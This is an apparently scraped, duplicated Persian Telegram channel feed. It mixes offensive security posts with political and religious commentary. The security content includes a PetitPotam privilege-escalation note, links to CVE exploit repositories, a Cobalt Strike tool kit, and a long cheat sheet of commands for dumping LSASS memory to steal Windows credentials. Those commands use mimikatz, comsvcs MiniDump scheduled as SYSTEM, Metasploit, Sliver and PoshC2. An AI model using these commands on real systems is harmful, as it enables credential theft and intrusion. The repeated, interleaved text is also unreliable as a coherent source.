به این ترتیب می توانید به راحتی توکن Access را از طریق Wildcard Origin در postMessage بدزدید.
#نکات #باگ_بانتی
#web #bugbounty #tips
@PfkSecurity
#نکات #باگ_بانتی
#web #bugbounty #tips
@PfkSecurity
#windows #privesc #rpc #petitpotam
🦛 PetitPotam: Local Privilege Escalation
Now PetitPotato can elevate to SYSTEM on the latest windows.
My test version is 10.0.20348.1547
PetitPotam
از MS-EFSR (رمزگذاری سیستم فایل رمزگذاری شده از راه دور) استفاده میکند، پروتکلی که برای انجام عملیات نگهداری و مدیریت بر روی دادههای رمزگذاریشده ذخیرهشده از راه دور و دسترسی از طریق شبکه استفاده میشود. یک سری API شبیه به EfsRpcOpenFileRaw در MS-EFSR وجود دارد. نحو API EfsRpcOpenFileRaw در زیر نشان داده شده است .
چنین API هایی می توانند یک مسیر UNC را از طریق پارامتر FileName برای باز کردن اشیاء رمزگذاری شده روی سرور برای پشتیبان گیری یا بازیابی مشخص کنند. وقتی مسیر در قالب \\IP\C$ مشخص شد، سرویس lsass.exe با دسترسی های حساب NT AUTHORITY SYSTEM به \\IP\pipe\srvsvc دسترسی خواهد داشت.
@pfksecurity
🦛 PetitPotam: Local Privilege Escalation
Now PetitPotato can elevate to SYSTEM on the latest windows.
My test version is 10.0.20348.1547
PetitPotam
از MS-EFSR (رمزگذاری سیستم فایل رمزگذاری شده از راه دور) استفاده میکند، پروتکلی که برای انجام عملیات نگهداری و مدیریت بر روی دادههای رمزگذاریشده ذخیرهشده از راه دور و دسترسی از طریق شبکه استفاده میشود. یک سری API شبیه به EfsRpcOpenFileRaw در MS-EFSR وجود دارد. نحو API EfsRpcOpenFileRaw در زیر نشان داده شده است .
long EfsRpcOpenFileRaw( [in] handle_t binding_h, [out] PEXIMPORT_CONTEXT_HANDLE* hContext, [in, string] wchar_t* FileName, [in] long Flags );چنین API هایی می توانند یک مسیر UNC را از طریق پارامتر FileName برای باز کردن اشیاء رمزگذاری شده روی سرور برای پشتیبان گیری یا بازیابی مشخص کنند. وقتی مسیر در قالب \\IP\C$ مشخص شد، سرویس lsass.exe با دسترسی های حساب NT AUTHORITY SYSTEM به \\IP\pipe\srvsvc دسترسی خواهد داشت.
@pfksecurity
This media is not supported in your browser
VIEW IN TELEGRAM
چگامه(شعر) : #ببر_مازندران .
✍سروده ی : #موبد_سوشیانت_مزدیسنا .
شنو غرش ببر مازندران
که لرزید دشمن کران تا کران
خروش سپهبد رضا میر پنج
ز خشم و ز کین و ز اندوه و رنج
که میهن به دام و به داغ قجر
تو گفتی برفتی به عصر حجر
فرومایه آن کوچک جنگلی
دگر شیخ آن خز عل انگلی
به دندان گرفتند ایران چو گرگ
چه غافل ز شاه، ببر بزرگ
یکایک بکرد سینه ی دیو، چاک
رضاشاه آن مرد بی ترس و باک
نیاسود یک دم ز سازندگی
ببخشود کشور ز نو زندگی
چو بودش نژاد یلان و کیان
بشد پهلوی بر زبان و بیان
۲۴ اسپند زاد روز #رضا_شاه بزرگ و اشو #زرتشت(به گزارش پهلوی موبد بزرگ زادسپَرم) فرخنده باد.
رضا شاه روانت شاد
@pfksecurity
✍سروده ی : #موبد_سوشیانت_مزدیسنا .
شنو غرش ببر مازندران
که لرزید دشمن کران تا کران
خروش سپهبد رضا میر پنج
ز خشم و ز کین و ز اندوه و رنج
که میهن به دام و به داغ قجر
تو گفتی برفتی به عصر حجر
فرومایه آن کوچک جنگلی
دگر شیخ آن خز عل انگلی
به دندان گرفتند ایران چو گرگ
چه غافل ز شاه، ببر بزرگ
یکایک بکرد سینه ی دیو، چاک
رضاشاه آن مرد بی ترس و باک
نیاسود یک دم ز سازندگی
ببخشود کشور ز نو زندگی
چو بودش نژاد یلان و کیان
بشد پهلوی بر زبان و بیان
۲۴ اسپند زاد روز #رضا_شاه بزرگ و اشو #زرتشت(به گزارش پهلوی موبد بزرگ زادسپَرم) فرخنده باد.
رضا شاه روانت شاد
@pfksecurity
CVE-2023-23415 ICMP RCE
مایکروسافت در بیانیه ای اعلام کرد: یک مهاجم می تواند از راه دور از این آسیب پذیری با استفاده از یک خطای پروتکل سطح پایین حاوی یک بسته IP تکه تکه شده در هدر که به ماشین هدف ارسال می شود، سوء استفاده کند.
این آسیب پذیری محصولات زیر مایکروسافت را تحت تأثیر قرار می دهد:
Windows Server 2008@(-∞، 14 مارس 2023)
Windows Server 2012@(-∞، 14 مارس 2023)
Windows Server 2016@(-∞، 14 مارس 2023)
Windows 10@(-∞، 14 مارس 2023)
Windows 11@(-∞، 14 مارس 2023)
Windows Server 2022@(-∞، 14 مارس 2023)
Windows Server 2019@(-∞، 14 مارس 2023)
هنوز POC وجود ندارد
#CVE
@PfkSecurity
مایکروسافت در بیانیه ای اعلام کرد: یک مهاجم می تواند از راه دور از این آسیب پذیری با استفاده از یک خطای پروتکل سطح پایین حاوی یک بسته IP تکه تکه شده در هدر که به ماشین هدف ارسال می شود، سوء استفاده کند.
این آسیب پذیری محصولات زیر مایکروسافت را تحت تأثیر قرار می دهد:
Windows Server 2008@(-∞، 14 مارس 2023)
Windows Server 2012@(-∞، 14 مارس 2023)
Windows Server 2016@(-∞، 14 مارس 2023)
Windows 10@(-∞، 14 مارس 2023)
Windows 11@(-∞، 14 مارس 2023)
Windows Server 2022@(-∞، 14 مارس 2023)
Windows Server 2019@(-∞، 14 مارس 2023)
هنوز POC وجود ندارد
#CVE
@PfkSecurity
P.F.K Security
احتمالاً بسیاری از شما راه های مختلفی برای dump پروسس Lsass در ویندوز می دانید. ممکن است کسی بیش از پنج راه را بداند، اما باور کنید راه های بسیار بیشتری وجود دارد. #0x01 > Mimikatz Methods: Sekurlsa::logonpasswords Sekurlsa::minidump lsadump::dcsync #0x02…
#0x06 > FTK Imager
Methods:
#0x07 > Volatility
Methods:
#0x08 > WinPmem
Methods:
#0x09 > hiberfil.sys
Methods:
#0x10 > Windows Error Reporting
Methods:
#0x11 > LiveKd
Methods:
#0x12 > Task Manager
Methods:
#0x13 > Cobalt Strike+SharpDump
Methods:
#0x14 > Cobalt Strike+mimikatz_command
Methods:
#0x15 > Cobalt Strike+taskkill
Methods:
#Lsass
@PfkSecurity
Methods:
Create Disk Image Physical Drive Capture Memory LSASS.exe#0x07 > Volatility
Methods:
Pstree volatility -f memory_dump.raw –profile=Win7SP1x64 memdump -p -D#0x08 > WinPmem
Methods:
winpmem.exe -o dump.raw#0x09 > hiberfil.sys
Methods:
windbg.exe -y srvc:\symbolshttps://msdl.microsoft.com/download/symbols -i c:\symbols -z C:\hiberfil.sys Yes !process 0 0 lsass.exe !process 0 0 lsass.exe; .dump /ma #0x10 > Windows Error Reporting
Methods:
HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps->DumpType->2 Lsass-Shtinkering.exe#0x11 > LiveKd
Methods:
LiveKd.exe -w !process 0 0 lsass.exe .process /p [lsass PID] .dump /ma [dump file path]#0x12 > Task Manager
Methods:
Powershell -ep bypass Get-Process lsass C:\Windows\System32\Taskmgr.exe /dumpfile=C:\lsass.dmp /pid=#0x13 > Cobalt Strike+SharpDump
Methods:
Execute-assembly SharpDump Or load sharpdumpsharpdump#0x14 > Cobalt Strike+mimikatz_command
Methods:
Mimikatz_command sekurlsa::minidump#0x15 > Cobalt Strike+taskkill
Methods:
taskkill /f /im lsass.exe#Lsass
@PfkSecurity
CVE-2023-23397
Microsoft Office Outlook
حاوی یک آسیبپذیری افزایش دسترسی است که به یک حمله NTLM Relay علیه سرویس دیگری اجازه میدهد تا به عنوان کاربر احراز هویت شود.
https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY
https://github.com/api0cradle/CVE-2023-23397-POC-Powershell
#CVE #Privesc
@PfkSecurity
Microsoft Office Outlook
حاوی یک آسیبپذیری افزایش دسترسی است که به یک حمله NTLM Relay علیه سرویس دیگری اجازه میدهد تا به عنوان کاربر احراز هویت شود.
https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY
https://github.com/api0cradle/CVE-2023-23397-POC-Powershell
#CVE #Privesc
@PfkSecurity
GitHub
GitHub - sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY: Exploit for the CVE-2023-23397
Exploit for the CVE-2023-23397. Contribute to sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY development by creating an account on GitHub.
💠 کمی عقب بایستید. یک لیوان آب بخورید. نفس عمیق بکشید و صحنه رو ببینید.
جمهوری اسلامی توانست با بازی تجزیهطلبی، که بیشتر یک فوبیای ذهنیه و نه خطر واقعی روی زمین، مانع از شکلگیری همگرایی همهی نیروها بر ضد خودش بشه. بد بازی خوردیم دوستان.
گاهی استفاده از هوش، بد نیست.
@PfkSecurity
جمهوری اسلامی توانست با بازی تجزیهطلبی، که بیشتر یک فوبیای ذهنیه و نه خطر واقعی روی زمین، مانع از شکلگیری همگرایی همهی نیروها بر ضد خودش بشه. بد بازی خوردیم دوستان.
گاهی استفاده از هوش، بد نیست.
@PfkSecurity
💠 قشری از براندازان قراره تا یک ماه با بمباران رسانه ای سرخوش و مدهوش باشن و گمان کنن اپوزوسیونی به صورت طوفانی پیش میره و مسیر سقوط رو هموار می کنه..
رسانه هایی نظیر ایران اینترنشنال و من و تو و.. با انواع و اقسام تیتر های مسرت بخش، جو رو هیجانی خواهند کرد و کنش هایی با استدلال منطقی و چاره اندیشی تخصصی جای خودشون رو به کنش های سطحی و سانتیمانتال خواهند داد..
با عرض معذرت؛ یک الی دو ماه دیگر با سیل "چسناله" و "ناامیدی" از سوی این عزیزان رو به رو خواهیم شد..
یک الی دو ماه دیگر به این پست بازمیگردیم..
"زمان بهترین قاضی و آموزگار است"
@pfksecurity
رسانه هایی نظیر ایران اینترنشنال و من و تو و.. با انواع و اقسام تیتر های مسرت بخش، جو رو هیجانی خواهند کرد و کنش هایی با استدلال منطقی و چاره اندیشی تخصصی جای خودشون رو به کنش های سطحی و سانتیمانتال خواهند داد..
با عرض معذرت؛ یک الی دو ماه دیگر با سیل "چسناله" و "ناامیدی" از سوی این عزیزان رو به رو خواهیم شد..
یک الی دو ماه دیگر به این پست بازمیگردیم..
"زمان بهترین قاضی و آموزگار است"
@pfksecurity
💠 این جمله چامسکی به شکل وحشتناکی توصیف کننده وضعیت ما در این چند دهه است:
"هوشمندانه ترین راه برای منفعل و مطیع نگهداشتن مردم اینست که؛ حیطه عقاید قابل پذیرش مردم را سرسختانه محدود نگه داشت، ولی اجازه داد که بصورت عمیق در آن حیطه بحث و تبادل اندیشه داشته باشند."
#MahsaAmini
@PfkSecurity
"هوشمندانه ترین راه برای منفعل و مطیع نگهداشتن مردم اینست که؛ حیطه عقاید قابل پذیرش مردم را سرسختانه محدود نگه داشت، ولی اجازه داد که بصورت عمیق در آن حیطه بحث و تبادل اندیشه داشته باشند."
#MahsaAmini
@PfkSecurity
#Cobalt_Strike
مجموعه فایل های Beacon Object (BOF) برای Cobalt Strike
https://github.com/REDMED-X/OperatorsKit
@BlueRedTeam
@PfkSecurity
مجموعه فایل های Beacon Object (BOF) برای Cobalt Strike
https://github.com/REDMED-X/OperatorsKit
@BlueRedTeam
@PfkSecurity
GitHub
GitHub - REDMED-X/OperatorsKit: Collection of Beacon Object Files (BOF) for Cobalt Strike
Collection of Beacon Object Files (BOF) for Cobalt Strike - REDMED-X/OperatorsKit
🍊حکایت پرتقال در بطری!
🔻پدری به پسر خردسالش یک بطری کوچک داد، که داخل آن یک عدد پرتقال بزرگ بود!!
کودک با تعجب درون بطری را نگاه میکرد و با خود میگفت: پرتقال به این بزرگی چطوری داخل این بطری کوچک رفته؟
کودک خیلی تلاش کرد تا پرتقال را از بطری خارج کند، اما بی فایده بود!
سپس کودک از پدرش پرسید: چه جوری این پرتقال بزرگ داخل بطری رفتە است؟ آخر دهنەی این بطری خیلی کوچک است!!
پدر، پسر را به باغ برد و یک بطری خالی کوچک را به یکی از شاخه های درخت پرتقال بست. سپس ساقه ای که شکوفهی کوچک پرتقال داشت را درون بطری گذاشت، روزها سپری شد و شکوفه تبدیل به یک پرتقال بزرگ شد تا جایی که امکان خروج از بطری غیرممکن شده بود...
بعد از مشاهده این موضوع، کودک راز پرتقال را فهمید و جایی برای تعجب نمانده بود. پدر رو به پسر کرد و گفت:
چیزی که امروز مشاهده کردی همان دین است، اگر از خردسالی بذر اعتقادات دینی را درون ذهن کودک بکاریم در هنگام بزرگی، خارج کردنش خیلی سخت میشود.
دقیقا مثل این پرتقال که خارج کردنش محال است، مگر اینکه شیشه را بشکنیم و از بین ببریم.
وقتی که ادیان و حکومت های دینی اصرار دارند، افراد جامعه را از سنین بسیار کم و خردسالی در مدارس و مهدهای کودک با مذهب و آموزههایش آشنا کنند...
در واقع آنها اعتراف میکنند، که هدفشان تلقین و القای واقعی بودن و درستی دین نیست!!
✍ صادق هدایت
📌دلیل:
چون انسان در دوران کودکی، نه سواد کافی دارد، نه قدرت تشخیص دادن درست از نادرست را و در ناآگاهی به سر میبرد!!..
به این دوران در روانشناسی میگویند: ذهن سازی
طبق قاعده، آموزش در کودکی مانند نقاشی روی سنگ است که به سادگی پاک نمیشود، حال چه آموزش جهل باشد و چه پرورش ذهن پرسشگر.
💡بهترین هدیه ما به فرزندانمان «آگاهی» است تا از گزند استثمارگران چپ و راست (با ابزار ایدئولوژی) رهایی یابد.
@pfksecurity
🔻پدری به پسر خردسالش یک بطری کوچک داد، که داخل آن یک عدد پرتقال بزرگ بود!!
کودک با تعجب درون بطری را نگاه میکرد و با خود میگفت: پرتقال به این بزرگی چطوری داخل این بطری کوچک رفته؟
کودک خیلی تلاش کرد تا پرتقال را از بطری خارج کند، اما بی فایده بود!
سپس کودک از پدرش پرسید: چه جوری این پرتقال بزرگ داخل بطری رفتە است؟ آخر دهنەی این بطری خیلی کوچک است!!
پدر، پسر را به باغ برد و یک بطری خالی کوچک را به یکی از شاخه های درخت پرتقال بست. سپس ساقه ای که شکوفهی کوچک پرتقال داشت را درون بطری گذاشت، روزها سپری شد و شکوفه تبدیل به یک پرتقال بزرگ شد تا جایی که امکان خروج از بطری غیرممکن شده بود...
بعد از مشاهده این موضوع، کودک راز پرتقال را فهمید و جایی برای تعجب نمانده بود. پدر رو به پسر کرد و گفت:
چیزی که امروز مشاهده کردی همان دین است، اگر از خردسالی بذر اعتقادات دینی را درون ذهن کودک بکاریم در هنگام بزرگی، خارج کردنش خیلی سخت میشود.
دقیقا مثل این پرتقال که خارج کردنش محال است، مگر اینکه شیشه را بشکنیم و از بین ببریم.
وقتی که ادیان و حکومت های دینی اصرار دارند، افراد جامعه را از سنین بسیار کم و خردسالی در مدارس و مهدهای کودک با مذهب و آموزههایش آشنا کنند...
در واقع آنها اعتراف میکنند، که هدفشان تلقین و القای واقعی بودن و درستی دین نیست!!
✍ صادق هدایت
📌دلیل:
چون انسان در دوران کودکی، نه سواد کافی دارد، نه قدرت تشخیص دادن درست از نادرست را و در ناآگاهی به سر میبرد!!..
به این دوران در روانشناسی میگویند: ذهن سازی
طبق قاعده، آموزش در کودکی مانند نقاشی روی سنگ است که به سادگی پاک نمیشود، حال چه آموزش جهل باشد و چه پرورش ذهن پرسشگر.
💡بهترین هدیه ما به فرزندانمان «آگاهی» است تا از گزند استثمارگران چپ و راست (با ابزار ایدئولوژی) رهایی یابد.
@pfksecurity
💠 #طرح_صدام_حسینی مجلس برای مجازات اظهارنظر افراد مشهور‼️
🔹 ١٠ تا ١۵ سال حبس، جزای نقدی و ۵ تا ١٠ سال محرومیت از حقوق اجتماعی، جریمهی روشنگری!!!
🔹هر فرد مشهور حتی از نظر علمی با هر نوع اظهار نظر حتی از طریق مقالات علمی مشمول این مجازات است/اعتماد
🔸برهانی(حقوقدان) در واکنش به طرح مجلس برای ممنوعیت اظهار نظر افراد مشهور گفت:
آزادی بیان، شهادتت مبارک.
🔸محسن برهانی(حقوقدان) در واکنش به طرح مجلس برای کنترل فعالیت و اظهار نظر افراد مشهور در توییتی نوشت:
خلاصه این طرح یعنی فکر نکنید و نظر ندهید تا فقط مراجع حکومتی نظر دهند! به فردای بعد از دوره نمایندگی هم فکر کنید؛ روزی که این مزخرفات، دامنتان را میگیرد. آزادی بیان، شهادتت مبارک.
@PfkSecurity
🔹 ١٠ تا ١۵ سال حبس، جزای نقدی و ۵ تا ١٠ سال محرومیت از حقوق اجتماعی، جریمهی روشنگری!!!
🔹هر فرد مشهور حتی از نظر علمی با هر نوع اظهار نظر حتی از طریق مقالات علمی مشمول این مجازات است/اعتماد
🔸برهانی(حقوقدان) در واکنش به طرح مجلس برای ممنوعیت اظهار نظر افراد مشهور گفت:
آزادی بیان، شهادتت مبارک.
🔸محسن برهانی(حقوقدان) در واکنش به طرح مجلس برای کنترل فعالیت و اظهار نظر افراد مشهور در توییتی نوشت:
خلاصه این طرح یعنی فکر نکنید و نظر ندهید تا فقط مراجع حکومتی نظر دهند! به فردای بعد از دوره نمایندگی هم فکر کنید؛ روزی که این مزخرفات، دامنتان را میگیرد. آزادی بیان، شهادتت مبارک.
@PfkSecurity
P.F.K Security
#0x06 > FTK Imager Methods: Create Disk Image Physical Drive Capture Memory LSASS.exe #0x07 > Volatility Methods: Pstree volatility -f memory_dump.raw –profile=Win7SP1x64 memdump -p -D #0x08 > WinPmem Methods: winpmem.exe -o dump.raw #0x09 > hiberfil.sys…
#0x16 > Cobalt Strike+Sysinternals
Methods:
Cobalt Strike+schtasks Methods:
Methods:
#0x18 > Metasploit+lsassy
Methods:
#0x19 > Covenant+SharpKatz
Methods:
#0x20 >Empire+wmiexec
Methods:
#0x21> Sliver+lsass_dump
Methods:
#0x22 > Villain
Methods:
#0x23 > Octopus
Methods:
#0x24 > NimPlant
Methods:
#0x25 > PoshC2+MiniDumpWriteDump
Methods:
#0x26 > PoshC2+NtQueryVirtualMemory
Methods:
#0x27 > PoshC2+BloodHound
Methods:
#Lass
@PfkSecurity
Methods:
load sysinternals Procexp “File” -> “Save”Cobalt Strike+schtasks Methods:
cmd /c cmd /c Schtasks.exe /create /RU SYSTEM /SC Weekly /D SAT /TN Commands /TR "'’rundll32.exe’’ C:\windows\system32\comsvcs.dll MiniDump “+strPID+” C:\Windows\Tasks\dump.bin full" /ST 06:06:06 && Schtasks.exe /run /TN Commands && REM ‘ -Force;”
#0x17 >Brute Ratel C4+KiwiMethods:
load kiwi Lsa_dump_sam lsa_dump_secrets#0x18 > Metasploit+lsassy
Methods:
use post/windows/gather/credentials/lsassy set SESSION Run or exploit#0x19 > Covenant+SharpKatz
Methods:
Create Task->Module->SharpKatz Arguments->lsa_dump#0x20 >Empire+wmiexec
Methods:
Modules credentials/mimikatz/lsass_dump Execute or run sekurlsa::minidump#0x21> Sliver+lsass_dump
Methods:
use lsass_dump Options run#0x22 > Villain
Methods:
villain.exe agent villain.exe client -c villain.exe dump lsass#0x23 > Octopus
Methods:
pupy.exe shell –cmd “python -m pupy.modules.pupywinutils.lsassdump -o C:\temp\lsass.dmp”#0x24 > NimPlant
Methods:
lsassdump#0x25 > PoshC2+MiniDumpWriteDump
Methods:
MiniDumpWriteDump Get-LsassDumpProcDump#0x26 > PoshC2+NtQueryVirtualMemory
Methods:
NtQueryVirtualMemory Get-LsassDumpNtQueryVirtualMemory#0x27 > PoshC2+BloodHound
Methods:
Get-LsassDumpBloodHound#Lass
@PfkSecurity